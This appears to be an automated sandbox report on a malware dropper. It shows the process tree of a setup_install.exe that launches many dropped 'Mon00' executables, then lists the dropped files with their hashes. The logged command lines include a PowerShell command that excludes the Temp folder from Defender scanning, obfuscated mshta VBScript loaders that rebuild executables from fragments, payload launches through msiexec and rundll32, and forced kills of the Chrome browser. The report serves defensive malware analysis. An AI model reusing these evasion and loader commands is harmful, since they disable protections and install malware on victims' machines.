cmd.exe PID 2740 wrote to memory of 468 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 468 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 468 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 468 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 468 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 1676 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 1676 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 1676 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 1676 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 1676 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 1676 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 1676 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2988 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2988 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2988 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2988 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2988 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2988 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2988 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 3040 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 3040 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 3040 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 3040 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 3040 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 3040 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 3040 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2828 2740 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe"C:\Users\Admin\AppData\Local\Temp\1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS47A72937\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon003b11682c.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon003b11682c.exeMon003b11682c.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon003b11682c.exeC:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon003b11682c.exe5⤵
- Executes dropped EXE
PID:2000
-
-
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon003b11682c.exeC:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon003b11682c.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1880
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00ef1e53f6f539435.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2508 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00ef1e53f6f539435.exeMon00ef1e53f6f539435.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 7965⤵
- Program crash
PID:2684
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00e469051c4c7a.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:468 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00e469051c4c7a.exeMon00e469051c4c7a.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCript:CLOse( CReatEoBJeCT ( "wscriPT.sheLL"). run ( "CMd.exe /C TYpE ""C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00e469051c4c7a.exe"" > ESYZ4xAO6IJ.eXE && sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if """"== """" for %t iN (""C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00e469051c4c7a.exe"" ) do taskkill /f -im ""%~NXt"" ",0, True))5⤵
- System Location Discovery: System Language Discovery
PID:2472 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYpE "C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00e469051c4c7a.exe" > ESYZ4xAO6IJ.eXE &&sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if ""== "" for %t iN ("C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00e469051c4c7a.exe" ) do taskkill /f -im "%~NXt"6⤵
- System Location Discovery: System Language Discovery
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXEESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1708 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCript:CLOse( CReatEoBJeCT ( "wscriPT.sheLL"). run ( "CMd.exe /C TYpE ""C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE"" > ESYZ4xAO6IJ.eXE && sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if ""/PdBPpkdCKFRGSs8QEyyO_B7~gkV ""== """" for %t iN (""C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE"" ) do taskkill /f -im ""%~NXt"" ",0, True))8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYpE "C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE" > ESYZ4xAO6IJ.eXE &&sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if "/PdBPpkdCKFRGSs8QEyyO_B7~gkV "== "" for %t iN ("C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE" ) do taskkill /f -im "%~NXt"9⤵
- System Location Discovery: System Language Discovery
PID:2632
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: close ( CREateobJect("wSCrIPt.SHELL" ). rUN( "CMd /q /C Echo | set /P = ""MZ"" > www1PR~.BG &cOpy /y /B www1pr~.BG + xZ62y.ZZY + NOSJk.fU+ mY33o.U faJSZJuU.PB& staRT msiexec -Y .\fAJszjUU.PB &dEL XZ62y.zZy NOSJk.fU MY33O.U WWW1pr~.Bg " , 0 ,truE ) )8⤵
- System Location Discovery: System Language Discovery
PID:2588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C Echo | set /P = "MZ" > www1PR~.BG &cOpy /y /B www1pr~.BG +xZ62y.ZZY+ NOSJk.fU+ mY33o.U faJSZJuU.PB& staRT msiexec -Y .\fAJszjUU.PB &dEL XZ62y.zZy NOSJk.fU MY33O.U WWW1pr~.Bg9⤵
- System Location Discovery: System Language Discovery
PID:1340 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "10⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>www1PR~.BG"10⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y .\fAJszjUU.PB10⤵
- System Location Discovery: System Language Discovery
PID:804
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "Mon00e469051c4c7a.exe"7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00ffeff6b2.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00ffeff6b2.exeMon00ffeff6b2.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00536518ad16.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2988 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00536518ad16.exeMon00536518ad16.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2132 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00536518ad16.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00536518ad16.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )5⤵
- System Location Discovery: System Language Discovery
PID:1032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00536518ad16.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00536518ad16.exe") do taskkill /F -Im "%~NxU"6⤵
- System Location Discovery: System Language Discovery
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2216 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )8⤵
- System Location Discovery: System Language Discovery
PID:2708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"9⤵
- System Location Discovery: System Language Discovery
PID:2480
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )8⤵
- System Location Discovery: System Language Discovery
PID:2840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I9⤵
- System Location Discovery: System Language Discovery
PID:332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "10⤵
- System Location Discovery: System Language Discovery
PID:3044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"10⤵
- System Location Discovery: System Language Discovery
PID:1148
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I10⤵
- System Location Discovery: System Language Discovery
PID:1696 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I11⤵
- System Location Discovery: System Language Discovery
PID:2768 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:2220
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I13⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\f795de9.exe"C:\Users\Admin\AppData\Local\Temp\f795de9.exe"14⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 65215⤵
- Program crash
PID:932
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon00536518ad16.exe"7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00df41776583.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00df41776583.exeMon00df41776583.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00df41776583.exeC:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00df41776583.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2324
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00d0d86f7f1e6.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2828 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00d0d86f7f1e6.exeMon00d0d86f7f1e6.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00946c5090.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2916 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00946c5090.exeMon00946c5090.exe4⤵
- Executes dropped EXE
PID:2860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00f8ffa77fe72688.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00f8ffa77fe72688.exeMon00f8ffa77fe72688.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- System Location Discovery: System Language Discovery
PID:1600 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00806cfb48.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:544 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00806cfb48.exeMon00806cfb48.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 2725⤵
- Loads dropped DLL
- Program crash
PID:888
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00b1dca232.exe /mixone3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00b1dca232.exeMon00b1dca232.exe /mixone4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00ea631982.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2928 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00ea631982.exeMon00ea631982.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon001dcfc58b0850.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon001dcfc58b0850.exeMon001dcfc58b0850.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Users\Admin\AppData\Local\Temp\is-U0C7C.tmp\Mon001dcfc58b0850.tmp"C:\Users\Admin\AppData\Local\Temp\is-U0C7C.tmp\Mon001dcfc58b0850.tmp" /SL5="$7015A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon001dcfc58b0850.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon001dcfc58b0850.exe"C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon001dcfc58b0850.exe" /SILENT6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\is-SHFFE.tmp\Mon001dcfc58b0850.tmp"C:\Users\Admin\AppData\Local\Temp\is-SHFFE.tmp\Mon001dcfc58b0850.tmp" /SL5="$8015A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon001dcfc58b0850.exe" /SILENT7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:1952
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon0086072e872c.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:328 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon0086072e872c.exeMon0086072e872c.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon0052c87b01411369.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\7zS47A72937\Mon0052c87b01411369.exeMon0052c87b01411369.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1976
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 4803⤵
- Program crash
PID:2932
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
433KB
MD5a98672182143436478fdb3806ef6cd5a
SHA15d93bb55d9e7915afb11361f42a4c9c6393718b3
SHA2562010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528
SHA5120d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892
-
Filesize
1.2MB
MD57c6b2dc2c253c2a6a3708605737aa9ae
SHA1cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA51219579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07
-
Filesize
343KB
MD569143c3e279096813040fa72b0371d4f
SHA1689ee0137e029f58b34e20dab8f3115e3f7f323c
SHA2561567686369bf90337140781d80a6a7f43f5a9ee5f0f6301977b66d794ca1297f
SHA5127dc0a9603ba42b3c03904e479d6288a133c2c4ae5fb5106734d4e8a082f701eb5d2c023d5f66eb617324579e4ae3a704eb21982f958ba0d18c6246a4a151c18e
-
Filesize
96KB
MD591e3bed725a8399d72b182e5e8132524
SHA10f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA25618af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76
-
Filesize
442KB
MD52de8d046d57fa60509800b164868a881
SHA1905be498f9490445da60c9ee457de1e8411ce074
SHA25602883fa63667972547fe36023646554c3d2895b41c5a8683ab5b2292f5d2d464
SHA512addb7b321517a94e1c4da2835178063a739ec01fa6d2e23b8221a50b6d6371b298e5f25a4bbc13d7e3990ab6116f50907e8d7409ee123824c6579fe5f6597735
-
Filesize
8KB
MD557d5ff3df107c648b937d9a9f2b2913a
SHA1976981fdecd8a4eba69470e48515e1dfb8183d19
SHA256a35c57c48ea797dc9f1a891aed4b2cef9f4bbacbf24fe317164dbaa02c43bcb8
SHA512e74e3772dd494a71f9073c6057ff7e9f7e1e7af4dcfb30832ca32f998ae1a3351f4adb9f774ac617bf55f73aba8e39d5777b500fcf7dcab6f70d58e899cce3e4
-
Filesize
1.5MB
MD5e2f65b4d95e309cc35900bfd4125e0b6
SHA1debd78147fc93aeb04e55b01ac31badad52a4d8e
SHA25651fc72953df863f42e300f2a4c3466a86e6e97f066f3bcabf9a342647eb096f3
SHA512dd5ee48afb249e78aaa63d992488c4f663ba6bd2b2252f85e6d133db0d700d72efbe3ddfe88d4e14dfc2d53a40ce8326d8a8c9c5941999be9393bfbe92a0dbe0
-
Filesize
402KB
MD5d08cc10c7c00e13dfb01513f7f817f87
SHA1f3adddd06b5d5b3f7d61e2b72860de09b410f571
SHA2560fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d
SHA5120b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0
-
Filesize
775KB
MD50d3a4198164c04b532d466c8ccc230e7
SHA1cfdb6ce04212f543f8e2bf8cd784e3c635e9a289
SHA256900033e11a0853c12ec6135e9050e776f39b0bab77b7824aa98bef4db361a2f2
SHA512d24655112faa883b506800a7b84f23b7446073c37e7d2f67289ec4fff0d54cba6aac7bfde8879dac6d3fa18b82cf96db1b2a2f8155e2b2a1e5c2ba9829004133
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
9KB
MD5a014b8961283f1e07d7f31ecdd7db62f
SHA170714b6dc8abbaa5d1cba38c047ea3a4ec6ac065
SHA25621ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89
SHA512bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
216KB
MD5b37377d34c8262a90ff95a9a92b65ed8
SHA1faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA51269d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
Filesize
691KB
MD59303156631ee2436db23827e27337be4
SHA1018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA5129fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
Filesize
379KB
MD57c20266d1026a771cc3748fe31262057
SHA1fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA2564b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f
-
Filesize
402KB
MD506ee576f9fdc477c6a91f27e56339792
SHA14302b67c8546d128f3e0ab830df53652f36f4bb0
SHA256035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8
SHA512e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616
-
Filesize
1.3MB
MD58aaec68031b771b85d39f2a00030a906
SHA17510acf95f3f5e1115a8a29142e4bdca364f971f
SHA256dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b
SHA5124d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df
-
Filesize
421KB
MD55535284a6c2d931c336cb4e67b146eb2
SHA11c1c64e2fba0d3bcd1a1851ec46a3163cc49dab0
SHA2569793a517c475fe2e4a361f6a6a99bb5dedd5d3a7db1b7ce6cf1f8f93c7f41b75
SHA5124833047de9198a7e92b35f1914c50f20a79778bb822cc282734cc0a95a2f4633dfe3e317ccbcd4fcc81b5f6d2242786d712eeab8e77dc589cbb693680a99767d
-
Filesize
1.4MB
MD5ba8541c57dd3aae16584e20effd4c74c
SHA15a49e309db2f74485db177fd9b69e901e900c97d
SHA256dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c
SHA5121bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d
-
Filesize
69KB
MD5451dff36acd7410c285b73baf5946183
SHA19f558e45a492185c7ed7ebfffe9cbcffc69383de
SHA256c0edb14c6a8417fe1eb17829d2838e9fad1b3cc3e748d585029f4a9c1c3c1551
SHA512a4aebd9840e964e71c11e37e07bf148098465db58761e4000e384f2deae641ecaabb62c63fc6c4d1f711eb60f285b86ab23ff3f77a575832bc75e1072b5e113a
-
Filesize
218KB
MD5d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
Filesize
54KB
MD5e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
